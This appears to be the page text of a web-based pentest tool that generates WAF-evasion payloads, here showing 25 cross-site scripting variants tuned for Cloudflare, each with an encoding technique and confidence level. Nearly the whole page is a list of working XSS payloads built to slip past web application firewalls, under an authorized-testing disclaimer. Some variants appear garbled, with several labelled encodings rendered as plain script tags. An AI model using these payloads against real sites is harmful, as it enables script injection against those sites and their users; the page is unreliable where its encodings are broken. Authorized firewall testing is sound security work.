WAF-Specific Payload Encoder

Select a target WAF profile and payload category, then enter a base payload to generate 10-50 targeted bypass variants. Each variant includes the encoding technique, confidence level, and explanation. Supports Cloudflare, AWS WAF, ModSecurity, Akamai, Imperva, F5, Sucuri, and Azure WAF. For authorized testing only.
Cloudflare WAF: Cloudflare uses ML-based detection with signature matching. Bypasses exploit Unicode normalization and encoding edge cases.
Techniques: Unicode normalization, chunked encoding tricks, case mixing, UTF-8 overlong encoding, HTML entity encoding
Payload Category: XSS, SQLi, CMDi, Path Traversal, SSTI, SSRF, XXE, LFI
Leave empty to use the default XSS payload.
Variants by confidence: High (9), Med (11), Low (5)
1 Overlong UTF-8 High
%c0%bc%c1%b3%c1%a3%c1%b2%c1%a9%c1%b0%c1%b4%c0%be%c1%a1%c1%ac%c1%a5%c1%b2%c1%b4%c0%a81%c0%a9%c0%bc%c0%af%c1%b3%c1%a3%c1%b2%c1%a9%c1%b0%c1%b4%c0%be
2 JS Unicode Braces High
\u{3c}\u{73}\u{63}\u{72}\u{69}\u{70}\u{74}\u{3e}\u{61}\u{6c}\u{65}\u{72}\u{74}\u{28}\u{31}\u{29}\u{3c}\u{2f}\u{73}\u{63}\u{72}\u{69}\u{70}\u{74}\u{3e}
3 Zero-Width Joiner Med
<script>alert(1)</script>
4 HTML Comment Wrap Low
<!--<script>alert(1)</script>-->
5 Plus-Space Encoding Med
%3Cscript%3Ealert(1)%3C%2Fscript%3E
6 Case Alternation Med
<ScRiPt>aLeRt(1)</sCrIpT>
7 Random Case Mix Med
<scRipt>aLeRT(1)</script>
8 URL Encoding Low
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
9 Double URL Encoding High
%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2531%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e
10 Hex Entity Encoding Med
<script>alert(1)</script>
11 Decimal Entity Encoding Med
<script>alert(1)</script>
12 Unicode Escape Med
\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e
13 Null Byte Injection Med
<script>aler%00t(1)</script>
14 Tab Insertion Low
<script>aler t(1)</script>
15 Newline Insertion Med
<script>aler%0at(1)</script>
16 Base64 Encoding Low
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
17 Reverse Payload Low
>tpircs/<)1(trela>tpircs<
18 Event Handler Tag High
<img src=x onload=alert(1)>
19 SVG onload High
<svg/onload=alert(1)>
20 Body onpageshow Med
<body onpageshow=alert(1)>
21 Details ontoggle High
<details open ontoggle=alert(1)>
22 javascript: Protocol Med
javascript:alert(1)
23 String.fromCharCode() High
String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62)
24 SVG Animate High
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
25 Math/Table Nesting High
<math><mtext><table><mglyph><svg><mtext><textarea><path id=x d="M0,0"><animate attributeName=d values="alert(1)"</textarea>
For authorized security testing only. These encodings are designed for penetration testers evaluating WAF configurations with proper authorization. Unauthorized use against systems you do not own or have permission to test is illegal. All processing happens client-side — no data is sent to any server.